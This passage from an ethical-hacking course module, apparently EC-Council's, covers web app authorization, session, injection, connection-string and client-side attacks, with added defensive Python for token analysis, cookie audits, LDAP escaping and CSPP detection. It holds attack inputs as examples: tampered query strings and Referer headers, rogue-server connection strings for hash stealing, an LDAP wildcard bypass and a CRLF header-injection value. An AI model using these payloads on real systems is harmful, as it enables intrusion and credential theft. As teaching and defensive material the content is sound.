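    c = issue_encoded_cookie("jason", "user")
    print(read_encoded_cookie(poison(c, role="admin")))     # role escalated, server none the wiser
    s = issue_signed_cookie("jason", "user", now=1000)
    print(read_signed_cookie(s, now=1500))                   # claims returned
    print(read_signed_cookie("X" + s[1:], now=1500))         # None: one byte changed
    print(resolve_remember_token("jason"))                   # None: guessing a name does nothing
```

Decoding the Base64 cookie, changing `role` and re-encoding takes one proxy round trip; against the signed cookie the same edit breaks the MAC and is rejected before the payload is parsed, and the remember-me token cannot be produced from an enumerated user name because the server only stores a hash of a random value.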
• 148. Web App Hacking Methodology: Attack Authorization Schemes

[Methodology diagram: the step "Attack Authorization Schemes" is highlighted among the other steps (Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services, and so on).]

Authorization protects a web application by granting certain users access to certain functions and data while denying it to others. Through authorization attacks, attackers try to reach information resources without the credentials that entitle them to those resources. The ways to attack authorization schemes are explained on the following slides.
• 149. Authorization Attack

- Attackers manipulate HTTP requests to subvert the application's authorization scheme by modifying input fields that relate to user ID, user name, access group, cost, file names, file identifiers, etc.
- Attackers first access the web application with a low-privileged account and then escalate privileges to reach protected resources.

In an authorization attack the attacker first obtains the lowest privileged account, logs in as an authenticated user, and then escalates privileges step by step to reach protected resources. Attackers manipulate HTTP requests to subvert the application's authorization scheme by modifying input fields that relate to user ID, user name, access group, cost, file names, file identifiers and so on. The request elements attackers work with to carry out authorization attacks are the uniform resource identifier, tampered parameters, POST data, HTTP headers, the query string, cookies and hidden form fields.

Parameter Tampering

Parameter tampering is an attack based on manipulating the parameters exchanged between client and server in order to modify application data such as the price and quantity of products, permissions, and user credentials. This information is usually carried in cookies, URL query strings or hidden form fields, and is relied upon by the application for access control and for its business functionality; an attacker who changes it changes what the application allows.

POST Data

• 150. POST data often carries authorization and session information, since in most applications the information supplied by the client must be associated with the session that supplied it. An attacker who finds that the application trusts this data can manipulate the POST body, and the information in it, as easily as a query string: the only difference is that it is not visible in the address bar.
• 151. HTTP Request Tampering

Query String Tampering
- If the query string is visible in the address bar of the browser, the attacker can easily change a string parameter to bypass authorization mechanisms.
- Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers
- If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionality.

Attackers tamper with the HTTP request without using another user's identity: the attacker changes the request in transit, before it reaches the intended receiver.

Query String Tampering

An attacker tampers with the query string when the web application uses query strings to pass data between pages. If the query string is visible in the address bar of the browser, the attacker can easily change a string parameter to bypass authorization mechanisms.

FIGURE 13.46: Query String Tampering (examples of parameters worth changing)

    http://www.juggyboy.com/mail.aspx?mailbox=john&company=acme%20com
    https://juggyshop.com/books/download/852741369.pdf
    https://juggybank.com/login/home.jsp?admin=true

Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters.

HTTP Headers

If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionality.

• 152. FIGURE 13.47: HTTP Headers

    GET http://juggyboy:8180/Applications/Download?ItemID=201 HTTP/1.1
    Host: janaina:8180
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
    Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
    Proxy-Connection: keep-alive
    Referer: http://juggyboy:8180/Applications/Download?Admin=False

ItemID=201 is not accessible because the Admin parameter in the Referer is set to False; the attacker can change it to True and access protected items. The Referer header is set by the client and is therefore under the attacker's full control.
• 153. Authorization Attack: Cookie Parameter Tampering

Cookie parameter tampering is a method used to tamper with the cookies set by the web application in order to perform malicious attacks.

- In the first step, the attacker collects some cookies set by the web application and analyzes them to determine the cookie generation mechanism.
- The attacker then traps cookies set by the web application, tampers with their parameters using tools such as OWASP Zed Attack Proxy or Paros Proxy, and replays them to the application.

Source: https://www.owasp.org
• 155. Web App Hacking Methodology: Attack Session Management Mechanism

(Methodology diagram; the highlighted step on this slide is Attack Session Management Mechanism.)

The session management mechanism is the key security component in most web applications. Because it plays such a central role, it has become a prime target for attacks against application session management. An attacker who breaks the application's session management can bypass even robust authentication controls and masquerade as another application user without knowing that user's credentials (user name, password). The attacker can even take the entire application under his or her control by compromising an administrative user in this way. The details of attacks on the session management mechanism are described on the following slides.
• 156. Session Management Attack

A session management attack is one of the methods attackers use to compromise a network. Attackers break an application's session management mechanism to bypass the authentication controls and impersonate a privileged application user.

A session management attack involves two stages: session token generation and exploiting session token handling.

To obtain a valid session token, the attacker performs:
- Session token prediction
- Session token tampering

Once the attacker has a valid session token, the attacker tries to exploit the session token handling in the following ways:
- Session hijacking
- Session replay
- Man-in-the-middle attack
• 157. Attacking Session Token Generation Mechanism

Attackers steal valid session tokens and then predict the next session token from the tokens they have obtained.

Weak Encoding Example

https://www.juggyboy.com/checkout?SessionToken=%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30

When the session token is merely the hex encoding of the ASCII string user=jason;app=admin;date=23/11/2010, the attacker can predict another session token by just changing the date and using it for another transaction with the server.

Session Token Prediction

Attackers obtain valid session tokens by sniffing the traffic or by legitimately logging in to the application, and analyze them for encoding (hex-encoding, Base64) or any pattern. If any meaning can be reverse engineered from the sample of session tokens, attackers attempt to guess the tokens recently issued to other application users.

• 158. Attackers then make a large number of requests with the predicted tokens to a session-dependent page to determine a valid session.
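As an added illustration (not part of the EC-Council course material), the following Python does what an analyst does when reviewing an application's tokens: it tries the encodings named on the slide (percent, hex, Base64) against the slide's own token, flags any decoding that reads as key=value state, and contrasts it with a token drawn from the OS random source. The token string is the one from the slide; the decoders, the structure check and all function names are this example's own.

```python
import base64
import binascii
import re
import secrets
from urllib.parse import unquote

# Constructed sample: the percent-encoded token shown on the slide. It is just
# the hex encoding of "user=jason;app=admin;date=23/11/2010", so anyone who
# decodes it can forge a token for another user or another date.
WEAK_TOKEN = (
    "%75%73%65%72%3D%6A%61%73%6F%6E%3B%61%70%70%3D%61%64%6D%69%6E%3B"
    "%64%61%74%65%3D%32%33%2F%31%31%2F%32%30%31%30"
)

# A decoded token that reads as key=value pairs carries application state in
# the clear; that is the "meaning" an attacker reverse engineers.
_STRUCTURED = re.compile(r"^[\w.\-/ ]+=[^;]*(;[\w.\-/ ]+=[^;]*)*;?$")


def _percent(token):
    # Only counts as a decoding if there was something to decode.
    return unquote(token) if "%" in token else ""


def _hex(token):
    if len(token) % 2:
        return ""
    return bytes.fromhex(token).decode("ascii")


def _base64(token):
    padded = token + "=" * (-len(token) % 4)
    return base64.urlsafe_b64decode(padded).decode("ascii")


def decode_candidates(token):
    """Every plausible plaintext reading of a token (percent, hex, Base64).
    Readings that are not printable ASCII are discarded."""
    found = []
    for decoder in (_percent, _hex, _base64):
        try:
            text = decoder(token)
        except (ValueError, binascii.Error):
            continue
        if text and text.isprintable():
            found.append(text)
    return found


def is_predictable(token):
    """True when some decoding of the token is structured key=value text."""
    return any(_STRUCTURED.match(text) for text in decode_candidates(token))


def generate_session_token(nbytes=32):
    """Defensive replacement: 256 bits from the OS CSPRNG and no embedded user
    data. The server keeps the token -> session mapping in its own store, so
    nothing about the user can be read out of, or guessed from, the token."""
    return secrets.token_urlsafe(nbytes)


if __name__ == "__main__":
    print(decode_candidates(WEAK_TOKEN))             # ['user=jason;app=admin;date=23/11/2010']
    print(is_predictable(WEAK_TOKEN))                # True
    print(is_predictable(generate_session_token()))  # False
```

The same check can be run over a batch of tokens captured from a test account: if any of them decode to readable state, the generation mechanism, not just the transport, needs to change.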
• 159. Attacking Session Tokens Handling Mechanism: Session Token Sniffing

Attackers first sniff the network traffic for valid session tokens and then predict the next session token based on the sniffed one. The attacker uses the predicted session ID to authenticate him or herself with the target web application. Thus, sniffing a valid session token is a central step in session management attacks.

Attackers sniff the application traffic using a sniffing tool such as Wireshark or an intercepting proxy such as Burp. If HTTP cookies are being used as the transmission mechanism for session tokens and the Secure flag is not set, attackers can replay the cookie to gain unauthorized access to the application. Attackers can use session cookies to perform session hijacking, session replay, and man-in-the-middle attacks.

Wireshark

Source: http://www.wireshark.org

Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network. It captures live network traffic from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, and FDDI networks. Captured files can be programmatically edited via the command line.
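Added example, not from the course and not from the Wireshark project: the defender-side counterpart of the capture described above, an audit of the Set-Cookie headers in an HTTP response that reports cookies issued without the Secure flag (and without HttpOnly or SameSite). The response text is constructed for this example, loosely modelled on the capture in Figure 13.49 but with invented cookie names and values; the list of session cookie names and all function names are assumptions of the example.

```python
# Constructed sample response: one session-style cookie is issued without any
# protective attribute, one cookie is set correctly.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: n18u=deleted; expires=Thu, 22-Sep-2011 10:22:33 GMT; "
    "path=/; domain=.example.com\r\n"
    "Set-Cookie: JSESSIONID=3F1A9C0D5E7B; Path=/\r\n"
    "Set-Cookie: csrftoken=abc123; Path=/; Secure; HttpOnly; SameSite=Strict\r\n"
    "Cache-Control: no-store, no-cache, must-revalidate\r\n"
    "\r\n"
    "<html>...</html>"
)

# Cookie names that commonly carry a session token (assumed list; extend it
# with your own application's cookie names).
SESSION_COOKIE_NAMES = {"jsessionid", "phpsessid", "asp.net_sessionid", "sessionid", "sid"}


def set_cookie_headers(raw_response):
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head, _, _ = raw_response.partition("\r\n\r\n")
    values = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "set-cookie":
            values.append(value.strip())
    return values


def audit_cookie(set_cookie_value):
    """Return (cookie name, list of findings) for one Set-Cookie value."""
    parts = [p.strip() for p in set_cookie_value.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for attr in parts[1:]:
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip()
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: the cookie is also sent over plain HTTP, "
                        "so a passive sniffer can capture and replay it")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: script on the page can read the cookie")
    if "samesite" not in attrs:
        findings.append("missing SameSite: the cookie is attached to cross-site requests")
    if name.lower() in SESSION_COOKIE_NAMES and findings:
        findings.append("this looks like a session cookie, so the above is high risk")
    return name, findings


def audit_response(raw_response):
    """Map every cookie name set by the response to its findings."""
    return dict(audit_cookie(v) for v in set_cookie_headers(raw_response))


if __name__ == "__main__":
    for cookie, problems in audit_response(SAMPLE_RESPONSE).items():
        print(cookie, "->", problems or "ok")
```

Feeding it the HTTP responses exported from a capture (or from an intercepting proxy's history) gives a quick inventory of which cookies would survive a plain-HTTP replay.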
• 160. FIGURE 13.49: Wireshark Tool Screenshot (Wireshark 1.8.2 showing a capture file Test(WS).pcapng: the packet list includes a GET /newmail/mailsignout.php HTTP/1.1 request and the HTTP/1.1 200 OK (text/html) response; the hex dump pane shows the response headers, including Server: Apache, a Set-Cookie header with expires, path and domain attributes, an Expires header, and Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0.)
• 161. Web App Hacking Methodology: Perform Injection Attacks

(Methodology diagram: Footprint Web Infrastructure, Attack Web Servers, Analyze Web Applications, Attack Authentication Mechanism, Attack Authorization Schemes, Attack Session Management Mechanism, Perform Injection Attacks, Attack Data Connectivity, Attack Web App Client, Attack Web Services.)

Injection attacks are very common in web applications. There are many types of injection attacks, such as web script injection, OS command injection, SMTP injection, SQL injection, LDAP injection, and XPath injection. Among all of these, the most frequently occurring attack is SQL injection. Injection takes place when data supplied by the user is sent to an interpreter as part of a command or query. To launch an injection attack, the attacker supplies crafted data that tricks the interpreter into executing unintended commands or queries. Because of injection flaws, the attacker can easily read, create, update, and remove any of the arbitrary data available to the application. In some cases, the attacker can even bypass a deeply nested firewall environment and take complete control over the application and the underlying system. The details of each injection attack are given on the following slides.
• 162. Injection Attacks

In injection attacks, attackers supply crafted malicious input that is syntactically correct according to the interpreted language being used, in order to break the application's normally intended input handling.

- Web Scripts Injection: If user input is used in code that is dynamically executed, enter crafted input that breaks the intended data context and executes commands on the server.
- OS Commands Injection: Exploit operating systems by entering malicious code in input fields if applications utilize user input in a system-level command.
- SMTP Injection: Inject arbitrary SMTP commands into the application and SMTP server conversation to generate large volumes of spam email.
- SQL Injection: Enter a series of malicious SQL queries into input fields to directly manipulate the database.
- LDAP Injection: Take advantage of non-validated web application input vulnerabilities to pass LDAP filters to obtain direct access to databases.
- XPath Injection: Enter malicious strings in input fields in order to manipulate the XPath query so that it interferes with the application's logic.

• 163. Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection Attacks.
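The list above states the common root of every injection class: user input that is syntactically valid in the interpreter's language changes the meaning of the command. As an added example (not the course's own code), the Python below works that principle through for the LDAP case: a login filter built by concatenation beside one that escapes the input per RFC 4515, plus a small filter evaluator (a toy written for this example, not a real directory server) so that the difference can be observed offline. The directory entries, attribute names and function names are constructed for the example; a real directory stores hashed passwords and checks credentials with a bind operation rather than a filter.

```python
import re

# Escapes required inside an LDAP search filter value (RFC 4515, section 3).
_FILTER_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}


def ldap_escape_filter_value(value):
    """Escape user input so that it can only ever be an attribute value,
    never filter syntax."""
    return "".join(_FILTER_ESCAPES.get(ch, ch) for ch in value)


def build_login_filter_unsafe(username, password):
    # Vulnerable pattern: input concatenated straight into the filter.
    return f"(&(uid={username})(userPassword={password}))"


def build_login_filter(username, password):
    # Hardened: every user-controlled value is escaped first.
    return (f"(&(uid={ldap_escape_filter_value(username)})"
            f"(userPassword={ldap_escape_filter_value(password)}))")


# --- Minimal filter evaluator (toy, for observation only) -------------------
# Supports the subset a login check needs: '&', '|', equality and the '*'
# presence test. Trailing text after the first complete filter is an error.

def parse_filter(text):
    node, end = _parse(text, 0)
    if end != len(text):
        raise ValueError("trailing data after filter")
    return node


def _parse(text, i):
    if text[i] != "(":
        raise ValueError("expected '('")
    i += 1
    if text[i] in "&|":
        op, i, kids = text[i], i + 1, []
        while text[i] == "(":
            node, i = _parse(text, i)
            kids.append(node)
        if text[i] != ")":
            raise ValueError("expected ')'")
        return (op, kids), i + 1
    close = text.index(")", i)          # an escaped ')' is written '\29', so this is safe
    attr, _, value = text[i:close].partition("=")
    return ("eq", attr, value), close + 1


def _unescape(value):
    return re.sub(r"\\([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), value)


def matches(node, entry):
    if node[0] == "&":
        return all(matches(k, entry) for k in node[1])
    if node[0] == "|":
        return any(matches(k, entry) for k in node[1])
    _, attr, value = node
    if attr not in entry:
        return False
    return True if value == "*" else entry[attr] == _unescape(value)


# Constructed directory for the example.
DIRECTORY = [
    {"uid": "admin", "userPassword": "S3cret!"},
    {"uid": "jason", "userPassword": "hunter2"},
]


def matching_users(build_filter, username, password):
    """Which directory entries the login filter produced by build_filter
    would match for the given input."""
    node = parse_filter(build_filter(username, password))
    return [e["uid"] for e in DIRECTORY if matches(node, e)]


if __name__ == "__main__":
    # A '*' in both fields turns each equality test into a presence test.
    print(matching_users(build_login_filter_unsafe, "*", "*"))     # ['admin', 'jason']
    print(matching_users(build_login_filter, "*", "*"))            # []
    print(matching_users(build_login_filter, "jason", "hunter2"))  # ['jason']
```

The same structure applies to the other classes in the list: the fix is never to strip "bad" characters from the input but to hand it to the interpreter in a form that cannot be read as syntax (escaping for LDAP and XPath values, parameterised queries for SQL, argument vectors rather than shell strings for OS commands).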
• 164. Web App Hacking Methodology: Attack Data Connectivity

(Methodology diagram; the highlighted step on this slide is Attack Data Connectivity.)

Attacking the data connectivity allows the attacker to gain unauthorized control over the information in the database. The various types of data connectivity attacks, their causes, and their consequences are explained in detail on the following slides.
• 165. Attack Data Connectivity

Attackers directly attack data connectivity so that they can access sensitive information available in the database. Database connectivity attacks exploit the way applications connect to the database instead of abusing database queries.

Data Connectivity Attacks
- Connection String Injection
- Connection String Parameter Pollution (CSPP) Attacks
- Connection Pool DoS

Database connection strings are used to connect applications to database engines. Example of a common connection string used to connect to a Microsoft SQL Server database:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"
• 166. Connection String Injection

A connection string injection attack can occur when dynamic string concatenation is used to build connection strings based on user input. If the string is not validated and malicious text or characters are not escaped, an attacker can potentially access sensitive data or other resources on the server. For example, an attacker could mount an attack by supplying a semicolon and appending an additional value. The connection string is parsed using a "last one wins" algorithm, and the hostile input is substituted for a legitimate value.

The connection string builder classes are designed to eliminate guesswork and protect against syntax errors and security vulnerabilities. They provide methods and properties corresponding to the known key/value pairs permitted by each data provider. Each class maintains a fixed collection of synonyms and can translate from a synonym to the corresponding well-known key name. Checks are performed for valid key/value pairs, and an invalid pair throws an exception. In addition, injected values are handled in a safe manner.

Before injection

The common connection string connects to the Microsoft SQL Server database as follows:

• 167. "Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd;"

FIGURE 13.50: Before injection

After injection

In a delegated authentication environment, attackers can easily inject parameters simply by appending them with a semicolon (;) character, using connection string injection techniques. In the following example, the user is asked to give a user name and password for creating a connection string. Here the attacker enters the password as "pwd; Encryption=off", which means the attacker has turned off the encryption of the connection. The resulting connection string becomes:

"Data Source=Server,Port; Network Library=DBMSSOCN; Initial Catalog=DataBase; User ID=Username; Password=pwd; Encryption=off"

FIGURE 13.51: After injection

When the connection string is populated, the Encryption value will be added to the previously configured set of parameters.
  • 168. Connection String Parameter Pollution (CSPP) Attacks

Connection string parameter pollution (CSPP) is used by attackers to steal user IDs and to hijack web credentials. CSPP specifically exploits semicolon-delimited database connection strings that are constructed dynamically from user input by web applications. In CSPP attacks, attackers overwrite parameter values in the connection string.

Hash Stealing
An attacker replaces the value of the Data Source parameter with that of a rogue Microsoft SQL Server connected to the Internet and running a sniffer:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Rogue Server; Password=; Integrated Security=true;

The attacker then sniffs Windows credentials (password hashes) when the application tries to connect to Rogue_Server with the Windows credentials it is running under.

Port Scanning
The attacker tries to connect to different ports by changing the port value and observing the error messages obtained:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target Server, Target Port=443; Password=; Integrated Security=true;

Hijacking Web Credentials
The attacker tries to connect to the database by using the web application's system account instead of a user-provided set of credentials:

Data source=SQL2005; initial catalog=db1; integrated security=no; user ID=;Data Source=Target Server, Target Port; Password=; Integrated Security=true;
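The three strings above all work because a semicolon-delimited connection string built by concatenation lets a user-supplied value add keys of its own, and the connection-string parser then honours the last occurrence of a repeated key. The following is an added example, not code from the course material: a small model of that parsing rule, the vulnerable builder, a hardened builder that refuses metacharacters, and a duplicate-key check a defender can run over strings the application assembles. The last-occurrence-wins rule and the synonym table are stated assumptions modelled on .NET's SqlConnectionStringBuilder; quoted values are not handled.

```python
import re

# Key synonyms that SQL Server connection strings accept (a subset, enough for the demo).
SYNONYMS = {
    "server": "data source", "address": "data source", "addr": "data source",
    "network address": "data source",
    "trusted_connection": "integrated security",
    "uid": "user id", "user": "user id",
    "pwd": "password",
    "database": "initial catalog",
}

# Characters with meaning inside a connection string; user input must never carry them unquoted.
METACHARACTERS = ";=\"'{}"


def parse_connection_string(conn):
    """Split a semicolon-delimited connection string into {key: value} and list repeated keys.

    Models the 'last occurrence wins' rule applied to repeated keys (synonyms such as
    Server/Data Source count as the same key). This is a demo model, not a full parser.
    """
    values, duplicates = {}, []
    for part in conn.split(";"):
        if "=" not in part:
            continue
        key, value = part.split("=", 1)
        key = re.sub(r"\s+", " ", key.strip().lower())
        key = SYNONYMS.get(key, key)
        if key in values:
            duplicates.append(key)
        values[key] = value.strip()
    return values, duplicates


def build_naive(user, password, server="SQL2005", catalog="db1"):
    """Vulnerable pattern from the slide: user-supplied values spliced straight into the string."""
    return (f"Data source={server}; initial catalog={catalog}; integrated security=no; "
            f"user ID={user}; Password={password};")


def build_safe(user, password, server="SQL2005", catalog="db1"):
    """Hardened builder: refuse any value carrying connection-string metacharacters.

    In production the platform's builder class (which quotes values) is the right tool;
    rejecting metacharacters is the minimal equivalent shown here.
    """
    for name, value in (("user", user), ("password", password)):
        if any(ch in value for ch in METACHARACTERS):
            raise ValueError(f"{name} contains connection-string metacharacters")
    return build_naive(user, password, server, catalog)


def is_polluted(conn):
    """Detection check: a repeated (or synonym) key in a string the application built
    from user input is a CSPP indicator worth logging and blocking."""
    return bool(parse_connection_string(conn)[1])


def safe_build_rejects(user, password):
    """True when build_safe refuses the pair."""
    try:
        build_safe(user, password)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed sample: the user ID field carries the hash-stealing injection from the slide.
    injected_user = "; Data Source=Rogue Server; Integrated Security=true"
    values, dups = parse_connection_string(build_naive(injected_user, ""))
    print(values["data source"], values["integrated security"], dups)
    print("rejected by build_safe:", safe_build_rejects(injected_user, ""))
```

The `is_polluted` check is the piece worth wiring into the application: run it on every string just before the connection is opened, and treat a repeated key as an attack rather than a configuration oddity.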
  • 170. Connection Pool DoS

The attacker examines the connection pooling settings of the application, constructs a large malicious SQL query, and runs multiple queries simultaneously to consume all connections in the connection pool, causing database queries to fail for legitimate users.

Example: By default in ASP.NET, the maximum allowed number of connections in the pool is 100 and the timeout is 30 seconds. Thus, an attacker can run 100 queries with 30+ seconds of execution time within 30 seconds to cause a connection pool DoS such that no one else would be able to use the database-related parts of the application.
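The arithmetic in the example (pool size 100, wait timeout 30 seconds, queries that run longer than the timeout) is easy to replay at small scale. The block below is an added example, not part of the course material: a threaded model of a fixed-size pool with a bounded wait, the flood from one client, and the mitigation a defender usually reaches for, a per-client cap on held connections (the attacker's queries beyond the cap are rejected instead of queued). The pool and limiter are constructed for the demo; numbers are scaled down so it runs in about a second.

```python
import threading
import time
from collections import defaultdict


class ConnectionPool:
    """Minimal model of a fixed-size connection pool with a bounded wait (like a pool's
    Max Pool Size and connect timeout). Assumption: a query holds one connection until done."""

    def __init__(self, max_size, wait_timeout):
        self._slots = threading.BoundedSemaphore(max_size)
        self.wait_timeout = wait_timeout

    def acquire(self):
        # False when no connection frees up within the timeout (the caller's query fails).
        return self._slots.acquire(timeout=self.wait_timeout)

    def release(self):
        self._slots.release()


class PerClientLimiter:
    """Mitigation: cap how many pooled connections one client (session, API key or IP) may
    hold at once, so a single caller cannot drain the pool for everyone else."""

    def __init__(self, pool, per_client_max):
        self.pool = pool
        self._quota = defaultdict(lambda: threading.BoundedSemaphore(per_client_max))

    def acquire(self, client):
        if not self._quota[client].acquire(blocking=False):
            return False                      # over quota: reject at once, do not queue
        if self.pool.acquire():
            return True
        self._quota[client].release()
        return False

    def release(self, client):
        self.pool.release()
        self._quota[client].release()


def simulate(pool_size, wait_timeout, attacker_queries, query_seconds, per_client_max=None):
    """Replay the slide's scenario: one client floods the pool with slow queries, then a
    legitimate user asks for a connection. Returns True if the legitimate user got one."""
    pool = ConnectionPool(pool_size, wait_timeout)
    limiter = PerClientLimiter(pool, per_client_max) if per_client_max else None

    def acquire(client):
        return limiter.acquire(client) if limiter else pool.acquire()

    def release(client):
        if limiter:
            limiter.release(client)
        else:
            pool.release()

    def slow_query(client):
        if acquire(client):
            time.sleep(query_seconds)         # stands in for the long-running malicious query
            release(client)

    flood = [threading.Thread(target=slow_query, args=("attacker",))
             for _ in range(attacker_queries)]
    for t in flood:
        t.start()
    time.sleep(0.1)                           # let the flood grab its connections first
    served = acquire("legitimate-user")
    if served:
        release("legitimate-user")
    for t in flood:
        t.join()
    return served


if __name__ == "__main__":
    print("no limiter, legitimate user served:", simulate(5, 0.2, 10, 0.5))
    print("per-client cap, legitimate user served:", simulate(5, 0.2, 10, 0.5, per_client_max=2))
```

A command timeout shorter than the pool wait is the other half of the defense: it bounds how long any single query can hold a connection, which the model's `query_seconds` deliberately leaves unbounded.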
  • 171. Web App Hacking Methodology: Attack Web App Client

Methodology steps shown: Footprint Web Infrastructure, Analyze Web Applications, Attack Authorization Schemes, Perform Injection Attacks, Attack Web App Client.

Attacks performed on a server-side application infect the client-side application when the client-side application interacts with the malicious server or processes malicious data. The attack on the client side occurs when the client establishes a connection with the server. If there is no connection between client and server, there is no risk, because no malicious data is passed by the server to the client. Consider an example of a client-side attack where an infected web page targets a specific browser weakness and exploits it successfully. As a result, the malicious server gains unauthorized control over the client system.
  • 172. Attack Web App Client

Attackers interact with the server-side applications in unexpected ways in order to perform malicious actions against the end users and access unauthorized data. Attackers use various methods to perform these attacks. The following attacks are performed by attackers to compromise client-side web applications:
Cross-Site Scripting
Redirection Attacks
HTTP Header Injection
Frame Injection
Request Forgery Attacks
Session Fixation
Privacy Attacks
ActiveX Attacks
  • 173. Cross-Site Scripting
An attacker bypasses the client ID's security mechanism, gains access privileges, and then injects malicious scripts into the web pages of a particular website. These malicious scripts can even rewrite the HTML content of the website.

Redirection Attacks
Attackers develop code and links in such a way that they resemble the main site the user wants to visit; however, when the user tries to visit the intended site, the user is redirected to the malicious website, where the attacker may obtain the user's credentials and other sensitive information.

HTTP Header Injection
An attacker splits the HTTP response into multiple responses by injecting a malicious response into HTTP headers. This attack can deface websites, poison caches, and trigger cross-site scripting.

Frame Injection
When scripts do not validate their input, code is injected by the attacker through frames. This affects all browsers and scripts that do not validate untrusted input. These vulnerabilities occur in HTML pages with frames. Another cause of this vulnerability is that editing of frames is supported by web browsers.

Request Forgery Attack
In this attack, the attacker exploits the trust that a website or web application has in the user's browser. The attack works by including a link in a page that accesses a site to which the user is authenticated.

Session Fixation
Session fixation helps an attacker hijack a valid user session. In this attack, the attacker authenticates himself or herself with a known session ID and then hijacks the user-validated session using knowledge of that session ID. In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an existing session ID value.

Privacy Attacks
A privacy attack is tracking performed with the help of a remote site, based on leaked persistent browser state.

ActiveX Attacks
The attacker lures the victim via an email or a link that has been crafted in such a way that loopholes for remote code execution become accessible. Attackers gain access privileges equal to those of an authorized user.
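Redirection attacks and HTTP header injection, both described above, commonly meet in the same place: a `Location` header built from a request parameter. The block below is an added example, not code from the course material, showing the two checks a handler needs before emitting that header: a same-site rule for the redirect target (relative paths or an allow-listed host only, with scheme-relative `//host` forms refused) and a control-character check so the value cannot terminate the header and split the response. The allow-list host `app.example.test` is a placeholder to substitute.

```python
from urllib.parse import urlsplit

# Hypothetical allow-list of this site's own hosts; substitute the real ones.
ALLOWED_REDIRECT_HOSTS = {"app.example.test"}


class HeaderInjection(ValueError):
    """Raised when a header value would let the response be split."""


def safe_header_value(value):
    """Reject CR, LF and NUL: a value containing them would end the current header line and
    let the remainder be read as further headers or a second response."""
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjection("control character in header value")
    return value


def validate_redirect(target):
    """Accept only same-site targets: a plain absolute path, or an absolute URL whose host is
    on the allow-list. Other hosts, scheme-relative //host forms and non-http schemes such
    as javascript: are refused, so the header cannot send the user to a look-alike site."""
    parts = urlsplit(target)
    if parts.scheme == "" and parts.netloc == "":
        # Relative target: exactly one leading slash. '//' and '/\' are read by browsers as
        # scheme-relative URLs and would escape the site.
        if target.startswith("/") and not target.startswith(("//", "/\\")):
            return target
        raise ValueError("unsafe relative redirect")
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return target
    raise ValueError("redirect to untrusted host or scheme")


def redirect_response(target):
    """Build the (status, headers) pair a handler would emit for a 'next=' style parameter.
    Unsafe targets get a 400 with no Location header at all."""
    try:
        location = safe_header_value(validate_redirect(target))
        return 302, [("Location", location)]
    except ValueError:
        return 400, []


if __name__ == "__main__":
    # Constructed inputs: a legitimate path, an off-site host and a response-splitting attempt.
    for candidate in ("/account", "https://evil.test/login", "/account\r\nSet-Cookie: sid=fixed"):
        print(repr(candidate), "->", redirect_response(candidate))
```

Keeping the two checks separate matters: frameworks that strip CR/LF silently still leave the open-redirect problem, and an allow-list alone does nothing against a CRLF hidden inside an otherwise valid path.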
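The session fixation paragraph above describes the attack entirely in terms of session IDs the server is willing to keep across login. As an added example (not code from the course material), the block below models two in-memory session stores: one that keeps whatever ID the client presented, and one that discards it at login and issues a fresh ID. `fixation_scenario` replays the slide's sequence (attacker obtains an ID, victim logs in carrying it, attacker presents it) against either store. Both stores and the scenario are constructed for the demo.

```python
import secrets


class FixationProneStore:
    """Session store that keeps whatever session ID the client presented across login.
    This is the pattern that makes fixation possible; it is kept here only as the 'before'."""

    def __init__(self):
        self._sessions = {}

    def new_session(self):
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid, user):
        # Accepts even an unknown ID and keeps it: an ID the attacker planted stays valid.
        self._sessions.setdefault(presented_sid, {"user": None})["user"] = user
        return presented_sid

    def user_for(self, sid):
        entry = self._sessions.get(sid)
        return entry["user"] if entry else None


class RotatingSessionStore(FixationProneStore):
    """Defense: at every privilege change (login) drop the presented ID and issue a fresh one.
    IDs the server never issued are simply discarded."""

    def login(self, presented_sid, user):
        self._sessions.pop(presented_sid, None)      # whatever was presented is now dead
        fresh_sid = secrets.token_urlsafe(32)
        self._sessions[fresh_sid] = {"user": user}
        return fresh_sid


def fixation_scenario(store_cls):
    """Replay the slide's description: the attacker obtains a valid session ID, tricks the
    victim into logging in with it, then presents that same ID. Returns True if the ID now
    identifies the victim's authenticated session (the hijack succeeded)."""
    store = store_cls()
    planted_sid = store.new_session()                 # attacker's own anonymous session
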